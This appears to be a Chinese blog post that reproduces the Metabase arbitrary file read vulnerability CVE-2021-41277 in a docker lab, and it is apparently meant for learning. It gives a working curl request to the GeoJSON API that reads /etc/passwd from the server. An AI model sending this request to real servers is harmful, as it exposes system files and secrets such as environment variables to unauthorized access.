Metabase任意文件读取漏洞(CVE-2021-41277)

Metabase任意文件读取漏洞

1.Metabase是什么

Metabase是一个开源的数据分析平台。在其0.40.0到0.40.4版本中,GeoJSON URL验证功能存在远程文件读取漏洞,未授权的攻击者可以利用这个漏洞读取服务器上的任意文件,包括环境变量等。

2.漏洞复现过程

我们这里还是老样子进入名为:CVE-2021-41277的漏洞环境中,我们通过docker-compose ps查看到端口号是:3000.
在这里插入图片描述
这时候通过浏览器打开看到是可以查看到Metabase的安装引导页面,我们填写初始账号密码,并且跳过后续的数据库填写的步骤即可完成安装,然后我们就可以看到如下图示的样子。在这里插入图片描述
接着我们使用CURL来进行复现操作,在kali用命令

curl -v http://your-ip:3000/api/geojson?url=file:etc/passwd

这时候可以看到图中所示,这样就是复现成功的样子。
在这里插入图片描述

3.总结

要认真学习漏洞复现的技巧,同时也要掌握工具使用。我也会继续前进的。

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

PatriotiWhiteHat

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值